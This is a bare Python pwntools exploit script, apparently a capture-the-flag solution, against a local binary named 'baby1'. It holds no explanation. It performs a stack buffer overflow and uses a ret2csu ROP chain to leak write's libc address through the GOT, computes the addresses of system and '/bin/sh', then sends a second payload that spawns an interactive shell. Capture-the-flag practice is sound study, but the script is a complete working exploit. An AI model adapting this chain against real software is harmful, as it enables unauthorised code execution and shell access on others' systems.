1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| r = process('./baby1')
e = ELF('./baby1', checksec=False)
libc = e.libc
pr = 0x4006c3
csu_init1 = 0x4006B6
csu_init2 = 0x4006A0
main_addr = e.symbols['main']
write_got = e.got['write']
write_os = libc.symbols['write']
read_got = e.got['read']
system_os = libc.symbols['system']
binsh_os = libc.search('/bin/sh').next()
libc_start = e.got['__libc_start_main']
payload = ""
payload += 'A'*56
payload += p64(csu_init1)
payload += "A"*8
payload += p64(0)
payload += p64(1)
payload += p64(write_got)
payload += p64(8)
payload += p64(write_got)
payload += p64(1)
payload += p64(csu_init2)
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(main_addr)
r.recvline()
r.sendline(payload)
leaked = u64(r.recv(6).ljust(8, '\x00'))
libc_base = leaked - write_os
system_addr = libc_base + system_os
binsh_addr = libc_base + binsh_os
payload = ""
payload += 'A'*56
payload += p64(pr)
payload += p64(binsh_addr)
payload += p64(system_addr)
r.sendlineafter("\n", payload)
r.interactive()
|
